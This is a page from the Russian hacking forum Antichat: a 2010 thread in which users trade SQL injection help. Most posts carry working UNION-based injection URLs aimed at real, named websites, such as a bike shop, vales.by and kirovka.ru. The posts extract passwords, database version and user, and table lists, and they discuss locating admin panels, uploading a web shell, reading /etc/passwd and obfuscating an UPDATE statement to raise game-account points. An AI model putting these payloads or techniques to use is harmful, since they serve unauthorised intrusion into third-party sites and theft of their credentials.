HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1534 из 2422 « Первая < 5341034143414841524 1530 1531 1532 1533 1534 1535 1536 1537 1538 1544158416342034 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.11.2010, 19:17
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию
Цитата:
Сообщение от ALIM  
используя такую конструкцию пытаюсь извлечь пассы
union select password,2,3,4,5,6,7,8,9,10 from users --
выводит 1 пасс
групконкат не работает
union select password,2,3,4,5,6,7,8,9,10 from users limit 1 --
выводит тот же пасс
union select password,2,3,4,5,6,7,8,9,10 from users limit 2 --
выводит тот же пасс
union select password,2,3,4,5,6,7,8,9,10 from users limit 1,0 --
union select password,2,3,4,5,6,7,8,9,10 from users limit 1,1 --
union select password,2,3,4,5,6,7,8,9,10 from users limit 2,1 --
ничего не выводит
почему так может происходить? Как правильно сделать запрос?
union select password,2,3,4,5,6,7,8,9,10 from users where username='admin'--
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 18.11.2010, 22:34
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию
Здесь есть скуля?

http://www.diymtb.com.au/displayItems.asp?cid=14'
 
Ответить с цитированием

  #3  
Старый 18.11.2010, 22:42
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию
Цитата:
Сообщение от None  
Здесь есть скуля? http://www.diymtb.com.au/displayItems.asp?cid=14'
http://www.diymtb.com.au/displayItems.asp?cid=14'+order+by+10%23
 
Ответить с цитированием

  #4  
Старый 18.11.2010, 23:05
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию
Цитата:
Сообщение от pinch  
http://www.diymtb.com.au/displayItems.asp?cid=14'+order+by+10%23
Не могу вывести version(),database(),user(). Как это сделать?
 
Ответить с цитированием

  #5  
Старый 18.11.2010, 23:56
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию
Цитата:
Сообщение от None  
Сообщение от FlaktW
Не могу вывести version(),database(),user(). Как это сделать?
http://www.diymtb.com.au/displayItems.asp?cid=14'+union+select+1,2,concat(v ersion(),0x3a,database(),0x3a,user()),4,5,6,7,8,9, 10%23

p.s. не забудь +++ поставить я всетаки знаменитым хачу быть как Gorev...///=)))
 
Ответить с цитированием

  #6  
Старый 19.11.2010, 17:14
DavanG3
Новичок
Регистрация: 17.04.2010
Сообщений: 12
С нами: 8457001

Репутация: 1
По умолчанию
Хм жаль беспокоить Как я могу загрузить оболочку здесь?

Код:
http://www.vales.by/catalog.php?action=show_object&id=-99%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,17--
 
Ответить с цитированием

  #7  
Старый 19.11.2010, 17:19
KandidaT'S
Познающий
Регистрация: 09.07.2010
Сообщений: 58
С нами: 8338646

Репутация: 0
По умолчанию
моно ли тут прочитать etc/passwd?

http://kirovka.ru/business/?parentid=-30&article=-641+union+select+1,2,3,4,5,6,7,8,9--
 
Ответить с цитированием

  #8  
Старый 19.11.2010, 17:22
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
С нами: 8467184

Репутация: 1
По умолчанию
Цитата:
Сообщение от None  
Хм жаль беспокоить Как я могу загрузить оболочку здесь?
Через phpbb который там есть (по крайней мере есть таблица phpbb3_acl_users)

http://www.vales.by/catalog.php?action=show_object&id=-99%20UNION%20SELECT%201,2,3,4,group_concat%28table _name%29,6,7,8,9,10,11,12,13,14,15,16,17+from+info rmation_schema.tables--

Админка (не форума http://www.vales.by/admin/login.php)

Цитата:
Сообщение от None  
моно ли тут прочитать etc/passwd? http://kirovka.ru/business/?parentid=-30&article=-641+union+select+1,2,3,4,5,6,7,8,9--
Прочитать, кажись нельзя, но залить шелл возможно получится:

http://kirovka.ru/business/?parentid=-30&article=-641+union+select+1,2,concat_ws%280x3a,table_name%2 9,4,5,6,7,8,9+from+information_schema.tables+--+

Есть несколько форумов и так далее....
 
Ответить с цитированием

  #9  
Старый 19.11.2010, 18:59
killrok6
Познающий
Регистрация: 30.07.2010
Сообщений: 33
С нами: 8308406

Репутация: 0
По умолчанию
Привет Всем! Подскажите правильно я перевел этот код:

UPDATE dbo.Character SET AddPoint = AddPoint + 1

WHERE AccountID = 'login'

На вот этот:

'update/**/dbo.character/**/set/**/addpoint='addpoint+1'/**/where/**/accountid='login'
 
Ответить с цитированием

  #10  
Старый 19.11.2010, 19:06
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
С нами: 8467184

Репутация: 1
По умолчанию
Смотря что ты хочешь... если получить в базе addpoint+1, то да, если увеличить addpoint на единицу, то нет и, кстати, первый апостроф (перед update не нужен)
 
Ответить с цитированием
Ответ
Страница 1534 из 2422 « Первая < 5341034143414841524 1530 1531 1532 1533 1534 1535 1536 1537 1538 1544158416342034 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.